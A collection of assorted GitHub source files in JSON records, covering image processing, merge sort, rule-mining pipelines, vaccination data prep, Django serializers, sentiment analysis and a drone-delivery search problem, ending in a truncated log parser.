+{"seq_id":"9736443542","text":"def get_pic():\n return makePicture(pickAFile())\n \ndef betterBnW():\n pic = get_pic()\n pixels = getPixels(pic)\n for p in pixels:\n avg_color = avg_color = (getRed(p)*.299 + getGreen(p)*.587 + getBlue(p)*.114)\n newColor = makeColor(avg_color,avg_color,avg_color)\n setColor(p, newColor)\n return pic\n\n \ndef line_drawing(tolerance):\n drawing = betterBnW()\n width = getWidth(drawing)\n height = getHeight(drawing)\n for x in range(0, width-1):\n for y in range(0, height-1):\n px = getPixel(drawing, x, y)\n main_pixel = getColor(px)\n \n px_right = getPixel(drawing, x+1, y)\n right_pixel = getColor(px_right)\n \n px_bottom = getPixel(drawing, x, y+1)\n bottom_pixel = getColor(px_bottom)\n \n right_distance = distance(main_pixel, right_pixel)\n bottom_distance = distance(main_pixel, bottom_pixel)\n \n if right_distance < tolerance and bottom_distance < tolerance:\n setColor(px, white)\n else:\n setColor(px, black)\n show(drawing)\n \ndef line_drawing2(tolerance):\n drawing = betterBnW()\n width = getWidth(drawing)\n height = getHeight(drawing)\n for x in range(0, width-1):\n for y in range(0, height-1):\n px = getPixel(drawing, x, y)\n main_pixel = getRed(px)\n \n px_right = getPixel(drawing, x+1, y)\n right_pixel = getRed(px_right)\n \n px_bottom = getPixel(drawing, x, y+1)\n bottom_pixel = getRed(px_bottom)\n \n right_distance = abs(main_pixel - right_pixel)\n bottom_distance = abs(main_pixel - bottom_pixel)\n \n if right_distance > tolerance and bottom_distance > tolerance:\n setColor(px, black)\n else:\n setColor(px, white)\n show(drawing)","repo_name":"rogerterrill-csumb/CST205","sub_path":"CST205/linedrawing.py","file_name":"linedrawing.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74410101668","text":"import webbrowser\n\nclass Game():\n \"\"\"This class provides a way to store game related information\"\"\"\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n def __init__(self, game_title, poster_image,\n trailer_youtube):\n \"\"\"Initiates a movie Object with the specified arguments\"\"\"\n self.title = game_title\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n \"\"\"Opens game trailer in the webbrowser\"\"\"\n webbrowser.open(self.trailer_youtube_url)\n","repo_name":"AngelTX/FavoriteGamesWebsite","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73242882470","text":"def merge(s1, s2, s):\n \"\"\"Merge two sorted lists s1, s2 into properly sized list z\"\"\"\n i = j = 0\n while i + j < len(s):\n if j == len(s2) or (i < len(s1) and s1[i] < s2[j]):\n s[i+j] = s1[i] # copy ith element of s1 as next item of s\n i += 1\n else:\n s[i+j] = s2[j] # copy jth element of s2 as next item of s\n j += 1\n\n","repo_name":"asadrazaa1/Python-Data-Structures-and-Algorithms","sub_path":"Sortings/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"69880374949","text":"from .rule_mining.frequent_metapath_mining import FrequentMetapathSetMiner\nfrom .rule_mining.unification_mining import MetapathPatternUnificationMiner\nfrom .rule_mining.rule_pruning import RulePruner\nfrom .rule_mining.path_thresholds_optimisation import PathThresholdOptimiser\nfrom .rule_mining.rule_querying import MetapathRuleMatcher\nfrom .rule_mining.rule import Rule\nfrom .model.decision_set_classifier import DecisionSetClassifier\nimport numpy as np\nimport time\n\n__author__ = \"Alexandre Renaux\"\n__copyright__ = \"Copyright (c) 2023 Alexandre Renaux - Universite Libre de Bruxelles - Vrije Universiteit Brussel\"\n__license__ = \"MIT\"\n__version__ = \"1.0.1\"\n\n\ndef train_decision_set_model(relevant_rules, training_positives, training_negatives, sample_to_weight, algo_params, cpu_cores=0):\n \"\"\"\n Utils methods to train a decision set classifier with the given relevant rules and training data.\n\n Parameters:\n - relevant_rules: List of relevant rules for training\n - training_positives: List of positive training instances (gene pairs)\n - training_negatives: List of negative training instances (gene pairs)\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - alpha: Trade-off parameter for combining true positive rate and false positive rate\n\n Returns:\n - rule_set_classifier: Trained rule set classifier\n \"\"\"\n alpha = algo_params[\"alpha\"]\n rule_matcher = MetapathRuleMatcher(algo_params)\n\n sample_list = training_positives + training_negatives\n X_train_list = []\n y_train_list = []\n sample_weight_list = []\n for gene_pair in sample_list:\n X_train_list.append([gene_pair, None])\n y_train_list.append(1 if gene_pair in training_positives else 0)\n if sample_to_weight:\n sample_weight_list.append(sample_to_weight[gene_pair])\n X_train = np.array(X_train_list, dtype=object)\n y_train = np.array(y_train_list)\n sample_weight = np.array(sample_weight_list) if sample_to_weight else None\n\n # Model training\n rule_set_classifier = DecisionSetClassifier(relevant_rules, rule_matcher, alpha, cpu_cores=cpu_cores)\n rule_set_classifier.fit(X_train, y_train, sample_weight=sample_weight)\n\n return rule_set_classifier\n\n\ndef mine_relevant_rules(training_positives, training_negatives, metapath_dict, sample_to_weight, algo_params, sample_name, update_cache=False, pproc=None):\n '''\n Utils method to mine relevant metapath-based rules for the given training data and apply pruning methods.\n\n Parameters:\n - training_positives: List of positive training instances (entity pairs)\n - training_negatives: List of negative training instances (entity pairs)\n - metapath_dict: Dictionary mapping entity pairs to their metapaths\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - algo_params: Dictionary of all framework parameters\n - sample_name: Name of the analysis sample (for caching)\n - update_cache: Boolean flag to update the cache\n - pproc: Parallel processing context\n\n Returns:\n - relevant_rules: List of relevant rules\n '''\n rule_list, positive_matches_to_rule_ids, t1 = mine_candidate_rules(training_positives, metapath_dict, sample_to_weight, algo_params, sample_name, pproc=pproc, update_cache=update_cache)\n relevant_rules, t2 = apply_and_prune_rules(rule_list, positive_matches_to_rule_ids, training_negatives, metapath_dict, sample_to_weight, algo_params, sample_name, pproc=pproc, update_cache=update_cache)\n elapsed_time = t1 + t2\n return relevant_rules, elapsed_time\n\n\ndef 
mine_candidate_rules(training_positives, metapath_dict, sample_to_weight, algo_params, sample_name, update_cache=False, pproc=None):\n '''\n Utils method to mine candidate metapath-based rules for the given training data.\n Parameters:\n - training_positives: List of positive training instances (entity pairs)\n - metapath_dict: Dictionary mapping entity pairs to their metapaths\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - algo_params: Dictionary of all framework parameters\n - sample_name: Name of the analysis sample (for caching)\n - update_cache: Boolean flag to update the cache\n - pproc: Parallel processing context\n '''\n\n metapath_dict_positive = {key: metapath_dict[key] for key in training_positives}\n\n # Pattern mining from positive instances\n pattern_to_pos_matches, t1 = FrequentMetapathSetMiner(algo_params).run(metapath_dict_positive, sample_to_weight, sample_name, pproc=pproc, update_cache=update_cache)\n pattern_to_pos_matches, t2 = MetapathPatternUnificationMiner(algo_params).run(pattern_to_pos_matches, metapath_dict_positive, sample_to_weight, sample_name, pproc=pproc, update_cache=update_cache)\n pattern_to_pos_matches, t3 = RulePruner(algo_params).prune_non_closed_itemsets(pattern_to_pos_matches)\n pattern_to_pos_matches, t4 = PathThresholdOptimiser(algo_params).run(pattern_to_pos_matches, metapath_dict_positive, sample_to_weight, sample_name, pproc=pproc, update_cache=update_cache)\n\n # Generating the set of candidate rules\n start = time.process_time()\n positive_matches_to_rule_ids = {}\n for positive_match in training_positives:\n positive_matches_to_rule_ids[positive_match] = set()\n rule_list = []\n rule_id = 1\n for pattern, pos_matches in sorted(pattern_to_pos_matches.items(), key=lambda x: x[0]):\n rule = Rule(rule_id, pattern, 1, pos_matches)\n rule_list.append(rule)\n for pos_match in pos_matches:\n positive_matches_to_rule_ids[pos_match].add(rule_id)\n rule_id += 1\n\n elapsed_time = t1+t2+t3+t4 + (time.process_time() - start)\n\n return rule_list, positive_matches_to_rule_ids, elapsed_time\n\n\ndef apply_and_prune_rules(rule_list, positive_matches_to_rule_ids, training_negatives, metapath_dict, sample_to_weight, algo_params, sample_name, update_cache=False, pproc=None):\n '''\n Utils method to apply and prune candidate metapath-based rules for the given training data.\n Parameters:\n - rule_list: List of candidate rules\n - positive_matches_to_rule_ids: Dictionary mapping positive instances to their rules\n - training_negatives: List of negative training instances (entity pairs)\n - metapath_dict: Dictionary mapping entity pairs to their metapaths\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - algo_params: Dictionary of all framework parameters\n - sample_name: Name of the analysis sample (for caching)\n - update_cache: Boolean flag to update the cache\n - pproc: Parallel processing context\n Returns:\n - valid_rules: List of valid rules\n '''\n metapath_dict_negative = {key: metapath_dict[key] for key in training_negatives}\n negative_matches_to_rule_ids, t1 = MetapathRuleMatcher(algo_params).run(rule_list, metapath_dict_negative, sample_name, pproc=pproc, update_cache=update_cache)\n valid_rules, t2 = RulePruner(algo_params).prune_and_get_rules(rule_list, positive_matches_to_rule_ids, negative_matches_to_rule_ids, sample_to_weight)\n elapsed_time = t1+t2\n return valid_rules, 
elapsed_time\n\n\n\n","repo_name":"oligogenic/ARBOCK","sub_path":"arbock/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29503505039","text":"# This script prepares the data to be used in plots showing vaccination coverage over time\n# Data is given for different dose levels, and different age groups\n# RECOVAC provides data\n# Data given for 3 age ranges - 18+, 18-59, and 60+\n# Data given for first 4 doses\n# Graph will be 'area under the curve'\nimport pandas as pd\nfrom datetime import datetime as dt\n\n# first load data.\n# 18+ age\nRECO_18plus = pd.read_excel(\n \"data/vacc_pop_18plus.xlsx\",\n sheet_name=\"Sheet1\",\n header=0,\n engine=\"openpyxl\",\n keep_default_na=False,\n)\n\n# 18-59 age\nRECO_18to59 = pd.read_excel(\n \"data/vacc_pop_18-59.xlsx\",\n sheet_name=\"Sheet1\",\n header=0,\n engine=\"openpyxl\",\n keep_default_na=False,\n)\n\n# 60+ age\nRECO_60plus = pd.read_excel(\n \"data/vacc_pop_60plus.xlsx\",\n sheet_name=\"Sheet1\",\n header=0,\n engine=\"openpyxl\",\n keep_default_na=False,\n)\n\n# function to change the date:\ndef date_func(dataset):\n dataset[[\"Year\", \"Week\"]] = (\n dataset[\"wk\"].str.split(\"w\", expand=True).astype(int)\n ) # break apart week and year\n dataset[\"day\"] = 1 # set day as Monday\n dataset.drop(dataset[(dataset[\"Year\"] == 2019)].index, inplace=True)\n dataset[\"date\"] = dataset.apply(\n lambda row: dt.fromisocalendar(row[\"Year\"], row[\"Week\"], row[\"day\"]), axis=1\n )\n pd.to_datetime(dataset[\"date\"])\n dataset.drop(columns=[\"Week\", \"Year\", \"day\", \"wk\"], axis=1, inplace=True)\n dataset[\"date\"] = dataset[\"date\"].astype(str)\n # print(dataset.head())\n\n\n# Need to do some calculations to get JUST those with 1 dose, with 2 doses.. and calc. 0 doses\n# In the original dataset e.g. one dose included anyone that had had a dose (so includes 2 dose, 3 dose..)\ndef calc_func(dataset):\n # need to work out proportions UNVACCINATED - sum rest and minus from 1\n dataset.replace(r\"^\\s*$\", 0.0, regex=True, inplace=True)\n dataset[\"no_dose\"] = (1 - dataset[\"vacc1\"]) * 100\n dataset[\"one_dose\"] = (dataset[\"vacc1\"] - dataset[\"vacc2\"]) * 100\n dataset[\"two_dose\"] = (dataset[\"vacc2\"] - dataset[\"vacc3\"]) * 100\n dataset[\"three_dose\"] = (dataset[\"vacc3\"] - dataset[\"vacc4\"]) * 100\n dataset[\"four_dose\"] = dataset[\"vacc4\"] * 100\n dataset.drop(columns=[\"vacc1\", \"vacc2\", \"vacc3\", \"vacc4\"], axis=1, inplace=True)\n # print(dataset.head())\n\n\n# make a list of datasets on which to perform the function\n\ndatasets = [RECO_18plus, RECO_18to59, RECO_60plus]\n\n# run the functions to recalculate the proportions and format the date\nfor x in datasets:\n date_func(x)\n\nfor y in datasets:\n calc_func(y)\n","repo_name":"ScilifelabDataCentre/covid-portal-visualisations","sub_path":"RECOVAC/Swedishpop_vaccinecov_dataprep.py","file_name":"Swedishpop_vaccinecov_dataprep.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"40734973267","text":"\"\"\"Bugal Utils Serializers\"\"\"\n\n# Django REST Frameworks\nfrom rest_framework import serializers\n\n# Model\nfrom bugal.base.models import (\n Country, State, Gender\n)\n\n\nclass CountryModelSerializer(serializers.ModelSerializer):\n \"\"\"Country model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = Country\n fields = (\n 'id',\n 'name',\n 'short_name'\n )\n\n\nclass StateModelSerializer(serializers.ModelSerializer):\n \"\"\"Country model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = State\n fields = (\n 'id',\n 'name',\n 'short_name'\n )\n\n\nclass GenderModelSerializer(serializers.ModelSerializer):\n \"\"\"Gender model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n model = Gender\n fields = (\n 'id',\n 'identity'\n )\n","repo_name":"aquitania99/bugal-app","sub_path":"bugal/base/utils/serializers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72169075751","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer, TfidfVectorizer, HashingVectorizer\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nimport numpy as np\nimport pandas as pd\nimport re\nfrom nltk.stem.porter import PorterStemmer\nimport nltk\nfrom nltk.corpus import stopwords\nimport warnings\nimport pyprind\n\nwarnings.filterwarnings(\"ignore\") # 忽略warning\n\n\n# nltk.download(\"stopwords\")\n\n\ndef preprocessor(text):\n text = re.sub(\"<[^>]*>\", \"\", text)\n emoticons = re.findall(\"(?::|;|=)(?:-)?(?:\\)|\\(|D|P)\", text)\n text = re.sub(\"[\\W]+\", \" \", text.lower()) + \"\".join(emoticons).replace(\"-\", \"\")\n return text\n\n\ndef tokenizer(text):\n stop = stopwords.words(\"english\")\n text = re.sub(\"<[^>]*>\", \"\", text)\n emoticons = re.findall(\"(?::|;|=)(?:-)?(?:\\)|\\(|D|P)\", text)\n text = re.sub(\"[\\W]+\", \" \", text.lower()) + \"\".join(emoticons).replace(\"-\", \"\")\n tokenized = [w for w in text.split() if w not in stop]\n return tokenized\n\n\ndef stream_docs(path):\n with open(path, \"r\") as csv:\n next(csv)\n for line in csv:\n text, label = line[:-3], int(line[-2])\n yield text, label\n\n\ndef get_minibatch(doc_stream, size):\n docs, y = [], []\n try:\n for _ in range(size):\n text, label = next(doc_stream)\n docs.append(text)\n y.append(label)\n except StopIteration:\n return None, None\n return docs, y\n\n\ndef tokenizer_porter(text):\n porter = PorterStemmer()\n return [porter.stem(word) for word in text.split()]\n\n\n# pbar = pyprind.ProgBar(50000)\n# print(pbar)\n# labels = {\"pos\": 1, \"neg\": 0}\n#\n# df = pd.DataFrame()\n# for s in (\"test\", \"train\"):\n# for l in (\"pos\", \"neg\"):\n# path = \"./aclImdb/%s/%s\" % (s, l)\n# for file in os.listdir(path):\n# with open(os.path.join(path, file), \"r\") as infile:\n# txt = infile.read()\n# df = df.append([[txt, labels[l]]], ignore_index=True)\n# pbar.update()\n#\n# print(df)\n# preprocessor\n# np.random.seed(0)\n# df = df.reindex(np.random.permutation(df.index))x_train\n# df.to_csv(\"./movie_data.csv\", index=False)\n# count = CountVectorizer()\n# docs = np.array([\"The sun is shining\", \"The weather is sweet\", \"The sum is shining and the weather is sweet\"])\n# bag = count.fit_transform(docs)\n#\n# print(count.vocabulary_)\n#\n# print(bag.toarray()) # 值是出现了几次,索引是 count.vocabulary_ 的值\n#\n# tfidf = TfidfTransformer()\n# np.set_printoptions(precision=2)\n# print(tfidf.fit_transform(bag.toarray()).toarray())\n\n\ndf = pd.read_csv(\"./movie_data.csv\")\n\n# stop = stopwords.words(\"english\")\n# print([w for w in tokenizer_porter(\"a runner likes and runs a lot\")[-10:] if w not in stop])\n#\n# x_train = df.loc[:100, \"review\"].values\n# y_train = df.loc[:100, \"sentiment\"].values\n# x_test = df.loc[100:, \"review\"].values\n# y_test = df.loc[100:, \"sentiment\"].values\n# # print(x_train, y_train, x_test, y_test)\n#\n# tfidf = TfidfVectorizer(strip_accents=None, lowercase=False, preprocessor=None)\n# param_grid = [\n# {\"vect__ngram_range\": [(1, 1)], \"vect__stop_words\": [stop, None],\n# \"vect__tokenizer\": [tokenizer, tokenizer_porter], \"clf__penalty\": [\"l1\", \"l2\"],\n# \"clf__C\": [1.0, 10.0, 100.0]},\n# {\"vect__ngram_range\": [(1, 1)], \"vect__stop_words\": [stop, None],\n# \"vect__tokenizer\": [tokenizer, tokenizer_porter], \"vect__use_idf\": [False], \"vect__norm\": 
[None],\n# \"clf__penalty\": [\"l1\", \"l2\"], \"clf__C\": [1.0, 10.0, 100.0]}\n# ]\n# lr_tfidf = Pipeline([(\"vect\", tfidf), (\"clf\", LogisticRegression(random_state=0))])\n# gs_lr_tfidf = GridSearchCV(lr_tfidf, param_grid, scoring=\"accuracy\", cv=5, verbose=1, n_jobs=-1)\n# gs_lr_tfidf.fit(x_train, y_train)\n# print(\"Best parameter set: %s\" % gs_lr_tfidf.best_params_)\n# print(\"CV Accuracy: %.3f\" % gs_lr_tfidf.best_score_)\n# clf = gs_lr_tfidf.best_estimator_\n# print(\"Test Accuracy: %.3f\" % clf.score(x_test, y_test))\n\n\n# s = stream_docs(\"./movie_data.csv\")\n# k = 0\n# for i, j in s:\n# print(k, i, j)\n# k += 1\nvect = HashingVectorizer(decode_error=\"ignore\", n_features=2**21, preprocessor=None, tokenizer=tokenizer)\nclf = SGDClassifier(loss=\"log\", random_state=1, n_iter_no_change=1)\ndoc_stream = stream_docs(\"./movie_data.csv\")\n\npbar = pyprind.ProgBar(5)\nclasses = np.array([0, 1])\nfor _ in range(5):\n x_train, y_train = get_minibatch(doc_stream, size=1000)\n if not x_train:\n break\n x_train = vect.transform(x_train)\n clf.partial_fit(x_train, y_train, classes=classes)\n pbar.update()\n\nx_test, y_test = get_minibatch(doc_stream, size=1000)\nx_test = vect.transform(x_test)\nprint(\"Test Accuracy: %.3f\" % clf.score(x_test, y_test))\n","repo_name":"yaowenfeng1994/machine_learning_learn","sub_path":"sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":4809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
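The out-of-core loop in the record above works because HashingVectorizer is stateless: it needs no `fit`, so each minibatch can be transformed independently and fed to `SGDClassifier.partial_fit`. A small demonstration of that property:

```python
from sklearn.feature_extraction.text import HashingVectorizer

vect = HashingVectorizer(decode_error='ignore', n_features=2**21)
batch1 = vect.transform(['the movie was great'])
batch2 = vect.transform(['the movie was terrible'])
# No fit() call anywhere: both batches hash into the same 2**21 columns,
# which is what lets the incremental classifier consume them one at a time.
print(batch1.shape, batch2.shape)   # (1, 2097152) (1, 2097152)
```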
+{"seq_id":"31824326654","text":"# input: ['wish','you','a' ,'very' ,'happy', 'new','year']\n# output:['hsiw','a','yppah','raey']\n\nsen=input(\"enter a sentence \")\nl=sen.split()\nprint(l)\ni=0\nl2=[]\nwhile i list:\n result = {}\n for client, client_data in clients.items():\n for i in range(len(client_data['packages'])):\n result[client_data['packages'][i]]=client\n return result\n\n @staticmethod\n def get_manhattan_distance(source, destination):\n return abs(source[0] - destination[0]) + abs(source[1] - destination[1])\n\n def __init__(self, initial):\n \"\"\"Don't forget to implement the goal test\n You should change the initial to your own representation.\n search.Problem.__init__(self, initial) creates the root node\"\"\"\n self.map = initial[\"map\"]\n self.packages_locations = initial[\"packages\"]\n # ignore packages that are not required by any client, because we don't need to deliver\n self.needed_packages = self.get_needed_packages(initial[\"clients\"])\n self.clients = initial[\"clients\"]\n for drone, pos in initial[\"drones\"].items():\n initial[\"drones\"][drone] = [pos, []]\n #remaining_packages = list(filter(lambda package: package in self.packages_locations.keys(), self.needed_packages))\n remaining_packages=list(self.needed_packages.keys())\n client_index_in_path_dict = dict([(client_name, 0) for client_name in self.clients])\n initial = [initial[\"drones\"], remaining_packages, [], client_index_in_path_dict]\n search.Problem.__init__(self, pickle.dumps(initial))\n\n def actions(self, state):\n \"\"\"Returns all the actions that can be executed in the given\n state. The result should be a tuple (or other iterable) of actions\n as defined in the problem description file\"\"\"\n\n state = pickle.loads(state)\n clients_index_in_path_dict = state[3]\n drones_locations_and_current_packages_list_dict = state[0]\n remaining_packages = state[1]\n all_drone_actions = []\n clients_index_in_path_dict=state[3]\n for drone_name, location_and_current_packages in drones_locations_and_current_packages_list_dict.items():\n drone_location = location_and_current_packages[0]\n this_drone_actions = []\n\n # check where the drone can move\n # right\n if drone_location[1] + 1 < len(self.map[0]) and self.map[drone_location[0]][drone_location[1] + 1] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0], drone_location[1] + 1)))\n # left\n if drone_location[1] > 0 and self.map[drone_location[0]][drone_location[1] - 1] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0], drone_location[1] - 1)))\n # down\n if drone_location[0] + 1 < len(self.map) and self.map[drone_location[0] + 1][drone_location[1]] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0] + 1, drone_location[1])))\n # up\n if drone_location[0] > 0 and self.map[drone_location[0] - 1][drone_location[1]] == 'P':\n this_drone_actions.append((\"move\", drone_name, (drone_location[0] - 1, drone_location[1])))\n\n drone_packages = location_and_current_packages[1]\n # check if the drone can pick up a package\n\n if len(drone_packages) < 2:\n for package in remaining_packages:\n if self.packages_locations[package][0] == drone_location[0] \\\n and self.packages_locations[package][1] == drone_location[1]:\n this_drone_actions.append((\"pick up\", drone_name, package))\n\n # check if the drone can drop package\n if len(drone_packages)!=0:\n for i in range (len(drone_packages)):\n the_package=drone_packages[i]\n 
client_that_want_our_package=self.needed_packages[the_package]\n client_path = self.clients[client_that_want_our_package][\"path\"]\n client_index_in_path = clients_index_in_path_dict[client_that_want_our_package]\n client_location = client_path[client_index_in_path]\n if client_location[0] == drone_location[0] and client_location[1] == drone_location[1]:\n this_drone_actions.append((\"deliver\", drone_name, client_that_want_our_package,the_package))\n\n this_drone_actions.append((\"wait\", drone_name))\n\n all_drone_actions.append(this_drone_actions)\n\n # merge the drones actions\n # need to remove actions where two different drones pick same package\n merged_actions = list(itertools.product(*all_drone_actions))\n merged_actions = list(filter(self.is_legal_action, merged_actions))\n #merged_actions = list(tuple(action) for action in merged_actions)\n return merged_actions\n\n \"\"\"\n verifies that the action is legal\n this means that 2 drones can't pick up the same package\n \"\"\"\n @staticmethod\n def is_legal_action(action):\n for i in range(len(action)):\n if action[i][0] == \"pick up\":\n for j in range(i + 1, len(action)):\n if action[j][0] == \"pick up\" and action[i][2] == action[j][2]:\n return False\n return True\n\n def result(self, state, action):\n \"\"\"Return the state that results from executing the given\n action in the given state. The action must be one of\n self.actions(state).\"\"\"\n state = pickle.loads(state)\n clients_index_in_path_dict = state[3]\n drones_locations_and_current_list_dict = state[0]\n remaining_packages = state[1]\n dropped_packages = state[2]\n\n # apply action for all drones\n for drone_action in action:\n if drone_action[0] == \"move\":\n drone_to_move = drone_action[1]\n drone_new_location = drone_action[2]\n drones_locations_and_current_list_dict[drone_to_move][0] = drone_new_location\n if drone_action[0] == \"pick up\":\n drone_that_picks = drone_action[1]\n package_to_pick = drone_action[2]\n remaining_packages.remove(package_to_pick)\n drones_locations_and_current_list_dict[drone_that_picks][1].append(package_to_pick)\n if drone_action[0] == \"deliver\":\n drone_that_delivers = drone_action[1]\n package_to_deliver = drone_action[3]\n drones_locations_and_current_list_dict[drone_that_delivers][1].remove(package_to_deliver)\n dropped_packages.append(package_to_deliver)\n # add the package to the delivered packages after it is added\n if drone_action[0] == \"wait\":\n pass\n\n # move the clients\n for client_name in self.clients:\n client_path_len = len(self.clients[client_name][\"path\"])\n clients_index_in_path_dict[client_name] += 1\n clients_index_in_path_dict[client_name] = clients_index_in_path_dict[client_name] % client_path_len\n state = [drones_locations_and_current_list_dict, remaining_packages, dropped_packages, clients_index_in_path_dict]\n return pickle.dumps(state)\n\n def goal_test(self, state):\n \"\"\" Given a state, checks if this is the goal state.\n Returns True if it is, False otherwise.\"\"\"\n state = pickle.loads(state)\n dropped_packages = state[2]\n if len(self.needed_packages) == len(dropped_packages):\n return True\n return False\n\n def h(self, node):\n \"\"\" This is the heuristic. 
It gets a node (not a state,\n state can be accessed via node.state)\n and returns a goal distance estimate\"\"\"\n\n if self.goal_test(node.state):\n return 0\n state = pickle.loads(node.state)\n remaining_package = state[1]\n remaining_packages=copy.copy(remaining_package)\n drone_locations_and_current_packages_dict = state[0]\n all_h = []\n score=0\n for drone_name, location_and_current_packages in drone_locations_and_current_packages_dict.items():\n num_of_packages = len(location_and_current_packages[1])\n if num_of_packages == 2:\n dis,pak=self.get_distance_from_closest_client(location_and_current_packages[0], location_and_current_packages[1], state)\n all_h.append(dis)\n score+=1\n\n\n # can't drop packages, try to get closer to the closest package\n if num_of_packages == 0:\n if len(remaining_packages)>0:\n dis,pak=self.get_distance_from_closest_package_for_2(location_and_current_packages[0], remaining_packages, state)\n all_h.append(dis)\n remaining_packages.remove(pak)\n else:\n all_h.append(0)\n if num_of_packages == 1:\n if len(remaining_packages)>0:\n dis,pak= self.get_distance_from_closest_package_for_2(location_and_current_packages[0], remaining_packages,state)\n dis2,pak2= self.get_distance_from_closest_client(location_and_current_packages[0], location_and_current_packages[1], state)\n all_h.append(min(dis,dis2))\n if dis < dis2:\n remaining_packages.remove(pak)\n else:\n dis2, pak2 = self.get_distance_from_closest_client(location_and_current_packages[0],\n location_and_current_packages[1], state)\n all_h.append(dis2)\n\n\n\n\n dropped_packages = state[2]\n all_h = list(filter(lambda x: x is not None, all_h))\n if not all_h:\n # check for cases that all_h didn't have values that are not None, can happen in unsolvable problems\n all_h.append(1)\n max_dist = max(all_h)\n avg_dist = sum(all_h) / len(all_h)+ 1\n res = node.depth + len(set(self.needed_packages) - set(dropped_packages)) * avg_dist + len(\n remaining_packages) * avg_dist + max_dist\n\n return res\n\n\n def get_distance_from_closest_client(self, location, current_packages,state):\n clients_index_in_path_dict = state[3]\n distances_from_clients = []\n for i in range(len(current_packages)):\n clients_that_want_one_of_our_packages = self.needed_packages[current_packages[i]]\n client_path = self.clients[clients_that_want_one_of_our_packages][\"path\"]\n client_path_len=len(client_path)\n client_index_in_path = clients_index_in_path_dict[clients_that_want_one_of_our_packages]+1\n client_location = client_path[(client_index_in_path) % client_path_len]\n distances_from_client = self.get_manhattan_distance(location,client_location)\n distances_from_clients.append(distances_from_client)\n return min(distances_from_clients),0\n\n def get_distance_from_closest_package_for_2(self, location, packages,state):\n if not packages:\n return 0,0\n\n\n min=1000000000\n for package in packages:\n distances_from_packages=self.get_manhattan_distance(location, self.packages_locations[package])\n client_that_want_one_of_our_packages = self.needed_packages[package]\n client_path = self.clients[client_that_want_one_of_our_packages][\"path\"]\n client_path_len = len(client_path)\n client_index_in_path = state[3][client_that_want_one_of_our_packages]\n client_location = client_path[(client_index_in_path) % client_path_len]\n dist_from_client=self.get_manhattan_distance(self.packages_locations[package], client_location)\n dist = distances_from_packages+dist_from_client\n if dist < min:\n min=dist\n package_deliverd=package\n\n\n\n return 
min,package_deliverd\n \"\"\"Feel free to add your own functions\n (-2, -2, None) means there was a timeout\"\"\"\n\n\ndef create_drone_problem(game):\n return DroneProblem(game)\n","repo_name":"ShenhavOfir/DroneProblem","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":12479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
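Two of the static helpers above are easy to sanity-check in isolation. This assumes the DroneProblem class is importable from ex1; the action tuples follow the ("pick up", drone, package) shape that `actions()` builds:

```python
print(DroneProblem.get_manhattan_distance((0, 0), (2, 3)))  # 5

# Two drones picking up the same package in one joint action is illegal:
joint = (('pick up', 'drone1', 'package1'), ('pick up', 'drone2', 'package1'))
print(DroneProblem.is_legal_action(joint))                  # False
```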
+{"seq_id":"35713154750","text":"#! /usr/bin/python3\nimport os\nimport datetime\nimport re\nimport iota.harness.api as api\n\n__upg_log_path = \"/obfl/upgrade.log\"\n__upg_log_fname = \"upgrade.log\"\n__ERROR = \"E\"\n\ndef __find_err_in_upg_log(node, records):\n found_error = False\n\n for r in records:\n if r['lvl'] == __ERROR:\n api.Logger.error(f\"Found error message in upg log on {node}: {r['raw']}\")\n found_error = True\n return api.types.status.FAILURE if found_error else api.types.status.SUCCESS\n\ndef __is_record_type_state(record):\n return True if record and \"MoveStateMachine\" in record['fname'] else False\n\ndef __get_upg_log_fname_from_node(node, log_dir):\n return f\"{log_dir}/upgrade_{node}.log\"\n\ndef __get_datetime_from_record(record):\n if record:\n return datetime.datetime.strptime(record['ts'],\"%Y-%m-%d %H:%M:%S.%f+00:00\")\n return ts\n\ndef __disset_upg_log(node, logs):\n records = []\n\n for log in logs:\n r_exp = r\"(?P[I,D,E]) \\[(?P.*)\\] \\((?P.*)\\) \\[(?P.*)\\] (?P.*)\"\n m = re.search(r_exp, log)\n if m:\n records.append({e: m.group(e) for e in [\"lvl\", \"ts\", \"tid\", \"fname\", \"msg\"]})\n records[-1][\"raw\"] = log\n else:\n api.Logger.error(f\"Failed to dissect log on {node} : {log}\")\n return records\n\ndef 